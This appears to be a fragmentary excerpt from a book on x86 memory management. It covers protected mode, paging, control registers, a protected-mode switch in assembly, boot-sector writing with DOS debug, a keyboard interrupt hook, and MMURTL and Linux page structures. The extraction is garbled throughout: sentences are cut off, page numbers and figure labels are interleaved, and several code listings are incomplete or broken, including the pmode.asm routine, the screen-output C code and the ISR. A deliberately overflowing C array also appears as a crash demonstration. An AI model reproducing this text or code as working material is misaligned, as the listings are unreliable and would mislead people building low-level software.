As it turns out, the segment selector and segment descriptor
contain most of the information needed to implement a protec-
tion scheme. The processor makes ample use of this metadata to
track down memory access violations.
For example, the limit field in the segment descriptor is used
to help keep memory from being referenced beyond the desig-
nated last byte of a memory segment. Also, the type field in the
segment descriptor ensures that a segment that is specified as
read-only is not written to. The privilege fields in the segment
selector and segment descriptor are used by the processor to
prevent a program from illegally executing code or data that has
a higher privilege.
Privilege levels are how the operating system prevents user appli-
cations from manipulating the kernel image and compromising
security. In the real mode discussion, you saw how easy it was to
cause havoc and crash the system. I merely waltzed over to the
interrupt vector table and erased it. In protected mode, this threat
can be dealt with. Vital data structures and operating system code
can be safeguarded at the hardware level.
Intel supports four different privilege levels (0-3). Another way
to say this is that Intel supports four rings of protection. These rings
are illustrated in Figure 1.13 on the following page. This is actually a
pretty simple scheme as far as memory protection is concerned.
Decades ago when Control Data was building the NOSVE operating
system, the architects wanted to have 15 rings of protection! The
odd thing about contemporary operating systems like Linux and
Windows is that they only implement two rings of protection (one
for the kernel and another for everything else). They don’t take full
advantage of the facilities offered by the Pentium.
24 Chapter 1
Figure 1.13
/* --overflow.c-- */
Chapter 1
#include<stdio.h>
void main()
{
int array[4];
int i;
for(i=0;i<100;i++)
{
array[i]=i;
printf("set array[%d]=%d\n",i);
}
return;
}
There is a blatant array overflow in the code above. When you run
this application, it will crash and Windows will present you with a
dialog box like the one shown in Figure 1.14. If you’ve never seen a
dialog box like this before, take a good look. If you do any sort of
pointer-intensive development on Windows, you are bound to see it
sooner or later.
Figure 1.14
I have not said much about the control registers. The only control
register relevant to this current section is the CR0 control register.
We’ll see a couple of the other control registers in the next section.
The CR0 register’s first bit (the lowest-order bit) is known as the
PE flag (as in Protected Enable). By setting the PE flag to 1, we
switch the processor into protected mode and enable all of the seg-
ment protection features discussed earlier. Here is a snippet of
assembly code that performs this crucial task:
MOV EAX,CR0
OR AL,1
MOV CR0,EAX
Another equivalent way to do this is to use the special-purpose
SMSW and LMSW system instructions:
SMSW AX
OR AL,1
LMSW AX
26 Chapter 1
Figure 1.15
Memory Management Mechanisms 27
Chapter 1
1.9 and appended it with several steps so that we can accommodate
all of the extra bookkeeping needed for paging. The address formed
by the segment descriptor and the offset address in Figure 1.9 is no
longer the address of a byte in physical memory. Instead, a 32-bit
quantity is formed that is composed of three distinct offset
addresses. Two of these offset addresses are 10 bits in size and the
remaining offset address is 12 bits in size.
NOTE The base address stored in the page table entry is 20 bits in
size. The processor assumes that these are the 20 most significant bits
in a 32-bit base address, which is another way to say that the extra 12
bits are implied and all zero.
28 Chapter 1
NOTE Most operating systems assign each process their own page
directory so that each program’s linear address space maps to a differ-
ent section of physical storage. This guarantees, as long as the page
structures entries are not the same, that one process will not be able
to access the physical memory of another process.
Let’s take a closer look at what the page directory and page table
entries look like. (See Figure 1.16.)
A page directory entry has a number of special-purpose flags
related to caching that I am not going to go into. The really impor-
tant fields of the entry are the base address of the page table and the
page size (PS) flag. The present flag (P) is maintained by the local
operating system and is used to indicate if the page table is present
in memory. If it is not, the page table will need to be loaded via a
Memory Management Mechanisms 29
Chapter 1
Figure 1.16
page fault so that the address resolution cycle can continue. Most
operating systems, however, are wise enough to leave their crucial
data structures in memory.
The layout of a page table entry is displayed in Figure 1.17. As
you can see, it is very similar to the setup of the page directory
entry. The difference is that the fields in a page directory entry are
concerned with a page table. The fields in the page table entry are
concerned with a 4KB page of memory.
Figure 1.17
30 Chapter 1
One new thing you might notice is the dirty bit. The dirty bit indi-
cates that the page being referenced has been written to recently.
The present (P) flag and the dirty (D) flag are both used by the
operating system to help manage the process of paging. The operat-
ing system will usually clear the dirty flag when a page is loaded
into DRAM for the first time. The processor will then set the dirty
bit the first time that the page is updated.
You’ve already seen how the PE bit in CR0 is used to switch the
processor into protected mode. Using the paging facilities of the
processor requires even more participation of the control registers.
Figure 1.18 displays a summary of important control registers.
Reserved areas that should not be modified are shaded gray.
Figure 1.18
The CR0 is used to control the processor mode and state of the pro-
cessor. In the last section, we took a look at the PE flag, which is
responsible for placing the processor in protected mode. The other
really important flag in CR0, as far as paging is concerned, is the PG
flag at the other end of the register. When the PG flag is set, the
processor is enabled for paging. When the PG flag is cleared, linear
addresses are treated like physical addresses.
The CR1 is reserved, which is a nice way to say that it isn’t used
for anything. This is why I didn’t include it in Figure 1.18. For the
remainder of this section, you can ignore CR1. My guess is that
CR1 may have been created for the sake of some future use.
Memory Management Mechanisms 31
NOTE Digging a well before you are thirsty is not a bad idea. Any
Chapter 1
software architects worth their salt will make accommodations for
future modification and extension. If you have ever worked with the
Win32 API, you will, no doubt, have noticed a number of ambiguous
void* function parameters reserved for future use.
The CR2 register is used to store the linear address that has caused
a page fault. Mercifully, this value takes up the entire register.
The CR3 plays a central role in the resolution of physical
addresses when paging has been enabled. Specifically, this register
holds the base address of the page directory. If you look at Figure
1.15, you will see that CR3 plays a vital role in the address resolu-
tion process. If CR3 is corrupt, you can kiss your memory manager
goodbye. The other two flags (PCD and PWT) in this register are
related to caching and are not directly relevant to the immediate
discussion.
The CR4 register is used to enable a couple of advanced mecha-
nisms. For example, the PAE flag enables four extra address lines
when it is set. This would bring the number of address lines to 36.
Note that the PG flag must be set in CR0 in order for PAE to be
effective. Another flag of interest is the PSE bit. If PSE is cleared to
zero, the page size is 4KB. If PSE is set, the page size is 4MB. If
both PAE and PSE are set, the page size is 2MB.
Paging as Protection
Traditionally, paging has been used to artificially expand the amount
of memory to which a processor has access. Nevertheless, the Intel
architecture has embedded enough functionality into its paging
scheme that it is possible to use only paging facilities to implement
memory protection. In fact, if you wanted to push the envelope, you
could turn off segmentation-based protection and rely completely on
paging to provide memory protection. Naturally, this kind of sce-
nario is a little unusual, and there are a few conditions that need to
be satisfied.
The first condition is that a flat memory model is implemented. In
a flat memory model, there is one big segment. It is the simplest
possible memory model that can be used in protected mode. Every-
thing shares the same memory segment, and all the protective
services provided by segmentation are thrown to the wind. A flat
memory model is implemented by creating a GDT with three
entries. The first entry to the GDT is never used for some reason,
so in a sense it is just a placeholder. The second and third
descriptors are used to represent code and data segments. The trick
is to have both descriptors point to the same segment. The segment
32 Chapter 1
Figure 1.19
Chapter 1
tional segmentation checks can be performed. This leaves us with
two ways to protect areas of memory, assuming that paging has
been enabled. Both of these paging-based mechanisms rely on the
information in page table entries.
If you look back at Figure 1.17, you will see that there is a
read-write flag (bit 1) and also a user-supervisor flag (bit 2). The
user-supervisor flag can be used to institute a two-ring security
scheme. For example, by placing pages that constitute the operating
system in supervisor mode and application pages in user mode, the
kernel can be protected from malicious programs. If a user applica-
tion attempts to access pages that are in supervisor mode, the
processor will generate a page fault.
The read-write flag can be used to help enforce the user-supervi-
sor division. Specifically, when the processor is executing code in a
supervisor page, it can read and write anything. In other words, the
read-only flag for other memory pages is ignored. However, if the
processor is executing code in a user page, it can only read and
write to other user-level pages. If it tries to access a page marked
with supervisor status, the processor generates a page fault. A user
page’s ability to access other user pages depends on the status of
their read-write flags, which is to say that user-level code must
obey the read/write permissions of all the other pages.
Figure 1.20
doesn’t use segmentation or paging and Figure 1.19 does not apply
at all. You might also want to keep in mind that the offset portion of
a logical address does not necessarily have to be stored in a general
register; I am just using a general register for the sake of
illustration.
The linear address is the 32-bit value that is formed using the
base address value in the segment descriptor and the offset value in
the general register. If paging is not being used, the linear address
corresponds to an actual physical address.
If paging facilities are being used, the linear address will be
decomposed into three parts and the whole page directory/page
table cycle will need to be performed in order to arrive at a physical
address.
Chapter 1
to access that page, a page fault is generated. The native operating
system is responsible for catching the fault and loading the page into
an available page frame. The operating system will also set the
present flag (P) in the page’s corresponding page table entry.
The relationship between pages and page frames is illustrated in
Figure 1.21.
Figure 1.21
The third step may be foreign, even to those who know Intel assem-
bler — ah yes, the dreaded A20 address line. When the 8086 was
released, it had 20 address lines (A0 through A19). This allowed the
8086 to manage a 1MB address space. Any attempt to access mem-
ory beyond 1MB would wrap around to address 0. The Pentium
normally uses 32 address lines. However, the Pentium starts in real
mode at boot time and will try to mimic the 8086 by leaving the A20
address line disabled as the power-on default.
It just so happens that there is a logical AND gate called the A20
gate, which the A20 address line must pass through on its way to
the outside world. Just like a bit-wise AND operator in C, an AND
gate requires two inputs. The other input is derived from an output
pin on the 8042 keyboard controller. Most peripheral attachments to
the PC have their own dedicated microcontroller. The 8042 can be
programmed via the OUT assembly command so that it sends a 1 to
the A20 gate and enables the A20 address line.
NOTE More than anything else, the A20 line workaround was basi-
cally a kludge to allow compatibility between the 8086 and the 80286.
Using an available pin on a keyboard controller to address memory
issues is not exactly what I would call an elegant solution. It is not
exactly a fast solution either. Yikes!
Once the GDTR register has been loaded via the LDTR instruction
and the PE flag has been set in CR0, a FAR jump must be per-
formed. In Intel assembler, a FAR jump instruction is used to make
Memory Management Mechanisms 37
Chapter 1
(CS) and the instruction pointer register (IP) to be loaded with new
values. The motivation behind performing a FAR jump is that it
serves as a way to load CS with a segment selector.
The tricky part of the FAR jump is that it must be coded in
binary. Before we make the jump to protected mode, we are in real
mode. That means that the assembler will be treating instructions
using the traditional 16-bit interpretations. If we tried to code the
32-bit FAR jump in assembly language, the assembler (which is
chugging along in 16-bit mode) would either signal an error or
encode the jump instructions incorrectly. Thus, we are left with
doing things the hard way.
Here is the assembly source code in all its glory:
.486P
; -- pmode.asm --
;start here----------------------------------------------------
here:
JMP _main
; disable interrupts
CLI
; contents which we will load into the GDTR via LGDTR need
; to jump over the data to keep it from being executed as code
JMP overRdata
gdtr_stuff:
gdt_limit DW 0C0H
gdt_base DD 0H
38 Chapter 1
codeDescriptor:
CDlimit0_15 dw 0FFFFH ; low 16 bits of segment limit
CDbaseAddr0_15 dw 0 ; low 16 bits of base address
CDbaseAddr16_23 db 0 ; next 8 bits of base address
CDflags db 9AH ; segment type and flags
CDlimit_flags db 0CFH ; top 4 bits of limit, more flags
Memory Management Mechanisms 39
Chapter 1
dataDescriptor:
DDlimit0_15 dw 0FFFFH ; low 16 bits of segment limit
DDbaseAddr0_15 dw 0 ; low 16 bits of base address
DDbaseAddr16_23 db 0 ; next 8 bits of base address
DDflags db 92H ; segment type and flags
DDlimit_flags db 0CFH ; top 4 bits of limit, more flags
DDbaseAddr24_31 db 0 ; final 8 bits of base address
;main---------------------------------------------------------
PUBLIC _main
_main:
PUSH BP
MOV BP,SP
CALL _makeTheJump
POP BP
RET
;temp stack---------------------------------------------------
PUBLIC _tstack
_tstack DB 128 DUP(?)
CSEG ENDS
END here
You might notice that I intersperse data with code. Given that
everything has to lie in a single segment, I really don’t have a
choice. It is, however, legal to mix data in with your code, as long as
the region of memory storing the data is not treated like code and
executed. This is a trick they don’t always teach you in the books.
I built the previous program as a .COM executable using
Microsoft’s MASM. The command line to build the binary is:
C:\myfiles>ml /AT /FlpmodeList.txt pmode.asm
The /AT option causes the assembler to construct a .COM file (i.e.,
/AT means assemble with tiny memory model), which is really
nothing more than a raw binary. There are no address relocations or
fix-ups to be performed. The /Fl option causes a listing file to be
40 Chapter 1
generated. Listing files are a handy way to see what binary encoding
your assembler generates.
There is a little bit of a catch. Unfortunately, once the switch to
protected mode is made, I can’t do that much because the processor
expects (and wants) 32-bit machine code. Because the assembler
that created the program is running in 16-bit mode, I am plain out of
luck.
There is a way around this dilemma: The various snippets of
operating system bootstrap code that I have read typically load the
kernel into memory before the actual switch to protected mode is
performed. This allows the FAR jump to transfer processor control
to something that the processor can digest once it has switched
modes. The kernel is exclusively 32-bit code, so the processor will
have no problem following directions.
The side effect of all this is that you’ll need two different compil-
ers to write an OS on Intel. You need a 16-bit compiler to create the
boot code and a 32-bit compiler to write the operating system
proper. This whole process is illustrated in Figure 1.22.
Figure 1.22
NOTE Borland still sells a 16-bit DOS compiler with its TurboC++
suite. Microsoft sells Visual C++ 1.52, which can also generate 16-bit
code. There are also a number of freebie compilers on the Internet
that create 16-bit executables. I like Dave Dunfield’s MICRO-C
compiler.
You can also get Microsoft’s 16-bit CL.EXE compiler and MASM
assembler for free as part of the Windows Device Driver Kit. MASM
consists of two files: ML.EXE and ML.ERR. The only downside is that
they do not come with documentation.
Memory Management Mechanisms 41
Chapter 1
into ROM) will spring into action and look for a bootable device.
Remember that PCs start off in real mode. For the sake of simplic-
ity, let us assume that the BIOS locates a bootable diskette in drive
A. The BIOS will load the diskette’s boot sector into DRAM at
address 0000[0]:7C00 (i.e., physical address 0x07C00). This is
step number one.
Once the BIOS has loaded the boot sector, it hands over control
of the machine to whichever machine instructions now reside at
0000[0]:7C00. However, there are still a number of BIOS ser-
vices that can be accessed using interrupts. This is where the BIOS
plays a crucial role because there is a set of primitive disk I/O inter-
rupts that can be used to load the kernel.
Diskette sectors are 512 bytes in size, so there is really only
enough code to load the kernel from disk into memory (step 2) and
then switch to protected mode. At the end of the transition to pro-
tected mode, the 16-bit boot sector code will perform a manually
coded FAR jump to the kernel’s entry point (step 3). The kernel
code takes matters from there and the system is now in protected
mode and executing 32-bit instructions (step 4).
NOTE You will have to run this program under the auspices of DOS.
When I say this, I mean something like DOS 6.22. Do not try to run
this program in a virtual DOS console running on Windows 2000. You
will also have to make sure that no other memory management soft-
ware (i.e., HIMEM.SYS, EMM386.EXE) has been installed.
Unfortunately, you will need to reboot your machine, seeing as how I
overwrite the real mode interrupt vector table that lies at the bottom of
memory.
C:\code\boot>debug boot.com
-l
-w cs:0100 0 0 1
-q
C:\code\boot>
The –l command loads the boot.com file into memory. By
default, the boot.com file will be loaded by debug to address
CS:0x0100. The next command takes the instructions starting at
this address and writes them to drive A (i.e., drive 0) starting at log-
ical sector 0. A single, 512-byte sector is written. This may be
easier to understand by looking at the general format of the –w
command.
w startAddr driveLetter startSector nSectors
Once this has been done, the only thing left to do is to write the
kernel and place it on the diskette. You will need a 32-bit compiler
to write the kernel, and you should be aware that the compiler will
package your kernel code within some executable file format (i.e.,
the Windows Portable Executable (PE) file format), although I have
heard that gcc has a switch that will allow you to build a raw 32-bit
binary.
The best way to deal with this extra baggage is to jump over it,
which is to say that the boot sector code should take the formatting
headers into account and merely sidestep them. You might want to
disassemble your kernel file to determine where the header data
stops and where your kernel code begins.
You can use debug to write your kernel to the diskette, the
same way you as the boot sector.
Closing Thoughts
By now you should understand why memory management requires
the operating system and the processor to work closely together.
Nevertheless, the roles that the hardware and operating system
assume are, without a doubt, complementary.
The processor defines a mechanism for accessing, protecting, and
emulating memory. The hardware does, indeed, expect a special set
of data structures to be in place, like the GDT and the Page Direc-
tory. But these are merely extensions of the mechanism that the
processor provides.
It is the responsibility of the operating system to make use of the
processor’s services and mandate policy for using them. In the next
Memory Management Mechanisms 43
Chapter 1
issue of implementing memory management policies.
References
Blunden, Bill. “Methodology for OS Construction,” Phrack Issue 59.
www.phrack.com.
Brey, Barry. Intel Microprocessors 8086/8088, 80186/80188, 80286,
80386, 80486 Pentium, and Pentium Pro Processor, Pentium II,
Pentium III, and Pentium IV: Architecture, Programming, and
Interfacing. 2002, Prentice Hall, 6th Edition, ISBN: 0130607142.
This is a fairly recent book and should take care of any ques-
tions you may have. Barry has been writing about Intel chips
since the first one came out.
Intel Corporation. Intel Architecture Software Developer’s Manual,
Volume 3: System Programming Guide. 1997, order number
243192.
MIPS Technologies. MIPS64 Architecture For Programmers, Volume
III: The MIPS64 Privileged Resource Architecture. 2001, document
number: MD00091.
Podanoffsky, Michael. Dissecting DOS. 1995, Addison-Wesley, ISBN:
020162687X.
This book has a useful summary of the boot process on Intel
hardware. It also details the design and operation of RxDOS, an
enhanced clone of MS-DOS. In the spirit of the original DOS
implementation, Podanoffsky has written the entire OS in assem-
bly code. I’m not sure whether to admire his programming
fortitude or be disheartened by the lack of portability.
Wahbe, Lucco, Anderson, Graham. Efficient Software-Based Fault
Isolation. 1993, Proceedings of the Symposium on Operating
System Principles.
Chapter 2
Memory Management
Policies
“If I could remember the names of all these particles, I’d be a
botanist.”
— Enrico Fermi
45
46 Chapter 2
NOTE It is interesting to see how being at the right place at the right
time can change history. IBM had originally intended to use the CP/M
operating system sold by Digital Research. For whatever reason, the
deal fell through and Microsoft was there to catch the ball. Had Bill
Gates decided to complete his degree at Harvard, or had Digital
Research not bungled its deal with IBM, we would all probably be
using Apple computers.
Memory Management Policies 47
Chapter 2
(OEM). All requests for hardware services from user programs
must travel through MSDOS.SYS, a device-neutral I/O manager,
which translates the request into a format that can then be passed
to IO.SYS. MSDOS.SYS can be thought of as the kernel of DOS
(although your definition of “kernel” would have to be pretty loose).
COMMAND.COM is a command interpreter.
IO.SYS and MSDOS.SYS are both core system files. Without
these files, there is no DOS. The command interpreter, on the other
hand, can be replaced. There were several companies in the 1980s
that offered their own, enhanced version of COMMAND.COM. How
many readers remember Norton Commander?
Before DOS is loaded, the real mode address space of a bare com-
puter resembles that displayed in Figure 2.1. A bare-bones DOS
bootstrap will load all of its components into the region between the
BIOS data and video RAM.
Figure 2.1
48 Chapter 2
When a DOS machine boots, the BIOS locates a bootable disk and
loads its boot sector to 0000[0]:7C00. The boot sector then
inspects its disk for IO.SYS. How do I know this? One quick way to
verify this without performing a gruesome disassembly is to dump
the boot sector and look for character data that is hard coded.
This is how the debug utility could be used to perform this type
of investigation:
C:\WINDOWS>debug
-l cs:0100 0 0 1
-d cs:0280
158E:0280 C3 B4 02 8B 16 4D 7C B1-06 D2 E6 0A 36 4F 7C 8B .....M|.....6O|.
158E:0290 CA 86 E9 8A 16 24 7C 8A-36 25 7C CD 13 C3 0D 0A .....$|.6%|.....
158E:02A0 4E 6F 6E 2D 53 79 73 74-65 6D 20 64 69 73 6B 20 Non-System disk
158E:02B0 6F 72 20 64 69 73 6B 20-65 72 72 6F 72 0D 0A 52 or disk error..R
158E:02C0 65 70 6C 61 63 65 20 61-6E 64 20 70 72 65 73 73 eplace and press
158E:02D0 20 61 6E 79 20 6B 65 79-20 77 68 65 6E 20 72 65 any key when re
158E:02E0 61 64 79 0D 0A 00 49 4F-20 20 20 20 20 20 53 59 ady...IO SY
158E:02F0 53 4D 53 44 4F 53 20 20-20 53 59 53 00 00 55 AA SMSDOS SYS..U.
-q
NOTE TSR programs are loaded into memory and remain there
even after they terminate so that they can be reactivated quickly. The
doskey program, which supports command line history services, is a
good example of a TSR as is the DOS mouse driver. Because TSRs are
usually small, they are typically stuck into a UMB if possible.
Memory Usage
Chapter 2
The mem command can be used to obtain a snapshot of the operat-
ing system’s memory usage:
Memory Type Total = Used + Free
---------------- ------- ------- -------
Conventional 638K 97K 541K
Upper 0K 0K 0K
Reserved 0K 0K 0K
Extended (XMS) 65,532K 65,532K 0K
---------------- ------- ------- -------
Total memory 66,170K 65,629K 541K
As you can see, most of the system binaries are loaded into low
memory, where they share space with vital system data structures.
The segment addresses provided in the previous listing will need to
be multiplied by 16 (i.e., append the implied zero) in order to specify
an actual segment.
int offset;
/*
Have 80x25 screen
Each screen character in VRAM is described by two bytes:
[ASCII char][attribute]
lo byte hi byte
/*
ch = BP + savedBP + retaddress
= BP + 4 bytes
display attribute = BP+5
( 0FH = white foreground, black background )
*/
asm "MOV SI,BP";
asm "ADD SI,4H";
asm "MOV BYTE PTR +5[BP],BYTE PTR 0FH";
Chapter 2
asm "MOV DX,0B800H";
asm "MOV ES,DX";
asm "MOV DI,_offset";
/*
puts string at text position 'pos'
note: 2 bytes for each screen character,
so mult. offset by 2
*/
void putCRTStr(str,pos)
char *str;
int pos;
{
int i;
i=0;
offset=pos*2;
while(str[i]!=0)
{
putCRT(str[i]);
offset = offset+2;
i++;
}
return;
}/*end putCRTStr----------------------------------------------*/
void clearCRT()
{
int i;
offset=0;
for(i=0;i<=(80*25);i++){ putCRT(' '); offset=offset+2; }
offset=0;
return;
}/*end clearCRT-----------------------------------------------*/
52 Chapter 2
/*
test driver
*/
void main()
{
clearCRT();
putCRTStr("DOS is dead, Use Linux!",240);
return;
}/*end main---------------------------------------------------*/
You might notice that I am using rather old K&R syntax and unusual
inline statements. This is due to the fact that the compiler I am
using is Dave Dunfield’s handy MICRO-C PC86 C compiler. It’s one
of the only freebies on the Internet that I could find that would gen-
erate MASM friendly 16-bit assembler. In case you are interested,
here is my build script:
del crtio.obj
del crtio.exe
del crtio.asm
mcp crtio.c | mcc > crtio.asm
ML /Zm -c crtio.asm
LINK crtio.obj PC86RL_S.OBJ
NOTE You can also get Microsoft’s 16-bit CL.EXE compiler and
MASM assembler for free as part of the Windows Device Driver Kit.
MASM consists of two files: ML.EXE and ML.ERR. The only downside is
that they do not come with documentation.
Chapter 2
int oldseg;
int oldoff;
char kbd_buffer;
int delay;
void saveOldISR()
{
asm "MOV AH,35H";
asm "MOV AL,09H";
asm "INT 21H";
asm "MOV _oldseg,ES";
asm "MOV _oldoff,BX";
return;
}/*end saveOldISR---------------------------------------------*/
void setUpISR()
{
asm "PUSH DS";
asm "MOV CX,CS";
asm "MOV DS,CX";
asm "MOV DX,OFFSET newISR";
asm "MOV AH,25H";
asm "MOV AL,09H";
asm "INT 21H";
asm "POP DS";
return;
}/*end setUpISR-----------------------------------------------*/
void restoreOldISR()
{
asm "STI";
asm "PUSH DS";
asm "MOV CX,_oldseg";
asm "MOV DS,CX";
asm "MOV DX,_oldoff";
asm "MOV AH,25H";
asm "MOV AL,09H";
asm "INT 21H";
asm "POP DS";
return;
}/*end restoreOldISR------------------------------------------*/
void readKBD()
{
while(kbd_buffer==-1){}
kbd_buffer=-1;
return;
}/*end readKBD------------------------------------------------*/
void ISR()
{
asm "newISR:";
asm "STI";
asm "PUSH AX";
asm "PUSH BX";
asm "IN AL,60H ;get [scan code][status] from port 60H";
asm "MOV BL,AL";
asm "exitInterrupt:";
asm "mov AL,20H";
asm "out 20H,AL";
asm "pop BX";
asm "pop AX";
asm "iret";
return;
}/*end ISR----------------------------------------------------*/
void printBiosCh(ch)
char ch;
{
/*
ch = BP + savedBP + retaddress
= BP + 4 bytes
*/
asm "MOV AH,0EH";
asm "MOV AL,+4[BP]";
asm "INT 10H";
return;
Memory Management Policies 55
}/*end printBiosCh--------------------------------------------*/
void printBiosStr(cptr,n)
char* cptr;
int n;
{
int i;
for(i=0;i<n;i++){ printBiosCh(cptr[i]); }
return;
}/*end printBiosStr-------------------------------------------*/
Chapter 2
/* wrestle control from DOS and go on a joy ride */
void main()
{
kbd_buffer = -1;
delay=0;
printBiosStr("save-",5);
saveOldISR();
printBiosStr("setUp-",6);
setUpISR();
readKBD();
while(delay<=7)
{
printBiosCh('1'+delay);
delay++;
readKBD();
}
printBiosStr("-restore",8);
restoreOldISR();
return;
}/*end main---------------------------------------------------*/
Chapter 2
look at DJGPP’s cwsdpmi.exe DPMI host.
Figure 2.2
58 Chapter 2
NOTE Vendors who sell DOS extenders often required the developer
to embed all the memory management components in the application
itself. The motivation behind this was to guarantee that the application
could run on any DOS machine without having to impose a set of pre-
requisites. This tended to make applications using DOS extenders
relatively large. Some DOS extenders were almost entire operating
systems by themselves, especially when you compare them to DOS. It
is rumored that DOS extender technology, at Microsoft, was first imple-
mented in 1988 for a monster DOS application called Windows.
Chapter 2
memory problem. They also show how problems related to back-
ward compatibility can be extremely unpleasant.
allow outside events (i.e., the user) to force a task switch. Some
multiuser operating systems implement their own strict policies
and individual users have little or no control. With MMURTL,
however, the user has much more control over what gets the pro-
cessor’s attention. Given that MMURTL is a single-user operating
system, this makes sense.
Unlike DOS, MMURTL was originally designed to use Intel’s
protected mode memory management. Surprisingly, MMURTL uses
Chapter 2
only minimal segmentation and does not bother to implement mem-
ory protection on the segment level. Instead, MMURTL makes use
of paging to provide both memory allocation features and protection.
These architectural idiosyncrasies are what make this operating
system a good place to start.
Table 2.1
OsCodeDesc DataDesc CodeDesc
Base address 0x00000000 0x00000000 0x00000000
Size limit 0xFFFFF 0xFFFFF 0xFFFFF
Limit units 4KB increments 4KB increments 4KB increments
32-bit code/data Yes Yes Yes
Present in memory Yes Yes Yes
Privilege 0x0 0x0 0x0
Type Execute/Read Read/Write Execute/Read
NOTE MMURTL never uses an LDT, only a single GDT and a single
IDT (for interrupt handling). During the boot phase, the MMURTL
16-bit boot sector code loads the 32-bit kernel code from the disk to
memory at 0x6000. The kernel is loaded at 0x6000 to avoid wiping
out the BIOS data area, which is still needed. The boot code then
points the GDTR and IDTR registers to the GDT and IDT. The GDT and
IDT were loaded into memory as a part of the kernel image. The boot
sector code then switches the processor to protected mode and jumps
to the kernel entry point. Once this has transpired, the kernel will
reload itself to address 0x0. The BIOS code and data, which are over-
written in the process, are no longer needed.
Figure 2.3
Paging Variations
I have been using the terms “paging” and “virtual memory” synon-
ymously. The historical motivation for paging was to make use of
disk storage to simulate core memory. This traditional use is why I
have emphasized the employment of paging as a way to artificially
expand a computer’s address space. Those tiny little magnets were
expensive, and 8KB of core memory could only take you so far.
There are, however, other ways to use paging. If you recall from
Chapter 2
Chapter 1, the Pentium’s paging facilities take a linear address and
map it to a byte in physical memory. This address resolution mecha-
nism allows physical memory to be mapped to an artificial/linear
address space. A program running in a linear memory space uses
pointers holding linear addresses, which to the program appear to
correspond to actual physical memory locations. However, the
actual physical location of the program and its data have addresses
that are usually much different from the linear values. The nature of
the Pentium’s paging hardware allows for two distinct uses for vir-
tual memory:
n Virtual-paged memory
n Demand-paged virtual memory
In the case of virtual-paged memory, physical memory is broken up
into a series of pages. A linear address space is implemented, and
the hardware takes care of translating the linear addresses to the
physical addresses. The linear address space can be much larger
than the physical address space, but you will only be able to manage
an amount of memory equal in size to the physical address space. Vir-
tual-paged memory is “virtual” because the addresses being used
(i.e., the linear addresses) do not correspond to physical addresses.
Figure 2.4
Memory Management Policies 65
Chapter 2
Figure 2.5
QUESTION
How can this be done? How can applications share the same
linear address memory but still reside in separate regions of
physical memory?
ANSWER
The key is in the page tables and page directories. It is possi-
ble for a linear address to correspond to two different physical
addresses because it is nothing but a series of offsets. The base
addresses of items can differ, and this is what results in different
locations in DRAM. This is illustrated in Figure 2.6.
Figure 2.6
66 Chapter 2
Memory Allocation
MMURTL provides memory to user applications in 4KB pages. If
your application only needs 24 bytes, it will be up to the user space
libraries (i.e., malloc()) to take a 4KB page and break it into
smaller pieces. MMURTL exposes the following memory allocation
system calls to user applications:
n extern far U32 AllocPage(U32 nPages, U8
**ppMemRet);
n extern far U32 DeAllocPage(U8 *pOrigMem, U32
nPages);
n extern far U32 QueryPages(U32 *pdPagesLeft);
Chapter 2
number of free pages left
The AllocPage() function allocates memory in contiguous
pages. In addition, the memory address returned is the address of
the lowest byte in memory (i.e., the first byte of the first page).
All of these functions return a number of possible error codes.
There are dozens of error codes defined in MMURTL’s header files.
It is important to realize that an error code of zero means that there
are no problems.
#define ErcOK 0 /* Alls Well */
NOTE It may seem a bit odd, but one of the original detractors of
Linux was Tanenbaum! In January of 1992, Tanenbaum left a posting
on comp.os.minix titled “Linux is obsolete.” Needless to say, he was
wrong.
Chapter 2
like a Christmas list to Santa:
n Multiuser
n Symmetric multiprocessing (SMP)
n Protected mode memory protection
n Demand-paged virtual memory
n Dynamically and statically linked libraries
n Multiple file system support
n Loadable kernel modules (LKMs)
n High-performance TCP/IP stack
If you compare this feature list to MMURTL’s, you will see why I
discussed MMURTL first.
Figure 2.7
of kernel version 2.4, every CPU on the motherboard gets two seg-
ment descriptors in the GDT. Each CPU gets a descriptor specifying
a Task State Segment (TSS) and a descriptor specifying a segment
that stores a Local Descriptor Table (LDT). This is illustrated in
Figure 2.8.
Chapter 2
Figure 2.8
Three-Level Paging
In the previous chapter, I examined what is known as a two-level
paging model that uses two bookkeeping data structures: page
directories and page tables. Linux adds another data structure and
extends the linear address that it uses so that it has a three-level pag-
ing model. I assume that this has been implemented to allow Linux
to seamlessly extend itself to 64-bit architectures. The three-level
paging model is displayed in Figure 2.9
Figure 2.9
The CR3 control register holds the base address of the page global
directory. The highest-order 10-bit section of the linear address
stores an offset address into the page global directory and is added
to the base address in CR3 to specify a page global directory entry.
Memory Management Policies 73
Chapter 2
the page table. This page table entry will specify the base address of
a physical 4KB page of memory. The 12-bit portion of the linear
address is an offset into the physical page and specifies an actual
physical byte of memory.
QUESTION
Wait! Hold on a minute! (At least, I hope this is what you are
thinking.) The Pentium is a 32-bit processor that deals with
32-bit linear addresses. How does Linux resolve this fact?
ANSWER
As it turns out, Linux assumes that the portion of the linear
address that serves as an offset into the page middle directory
consists of zero bits. However, the page middle directory is kept
in the address resolution cycle for the sake of forward compatibil-
ity. It is just that Linux fixes the page middle directory so that it
has a single entry. In the case of the 32-bit Pentium, the page
global directory reverts to the page directory we know from ear-
lier. These adjustments are illustrated in Figure 2.10.
Figure 2.10
74 Chapter 2
Linux code base, these macros take different forms when the kernel
is not running on a 32-bit Pentium.
There is also a significant amount of page metadata that is exter-
nal to Intel’s native paging data structures, which is to say that the
metadata is relevant to Linux without being mandated by the pro-
cessor. For example, Linux allows pages to be locked. A locked page
of memory cannot be written out to disk. Kernel pages are locked.
The kernel also keeps a record of how many processes are using a
Chapter 2
particular page of memory. These extra features are supported by
the page structure:
typedef struct page
{
struct list_head list; /* -> Mapping has some page lists.*/
struct address_space *mapping; /* The inode (or ...)
we belong to. */
unsigned long index; /* Our offset within mapping. */
struct page *next_hash; /* Next page sharing our hash bucket
in the pagecache hash table. */
atomic_t count; /* Usage count, see below. */
unsigned long flags; /* atomic flags, some possibly
updated asynchronously */
struct list_head lru; /* Pageout list, eg. active_list;
protected by pagemap_lru_lock!!*/
wait_queue_head_t wait; /* Page locked? Stand in line... */
struct page **pprev_hash; /* Complement to *next_hash. */
struct buffer_head * buffers; /* Buffer maps us to a disk
block. */
void *virtual; /* Kernel virtual address (NULL
if not kmapped, ie. highmem) */
struct zone_struct *zone; /* Memory zone we are in. */
} mem_map_t;
This structure is defined in /usr/src/linux/include/
linux/mm.h. The count member keeps track of how many pro-
cesses are using a page. The count variable is zero if the page is
free. The flags member stores 32 Boolean fields. Its first bit, the
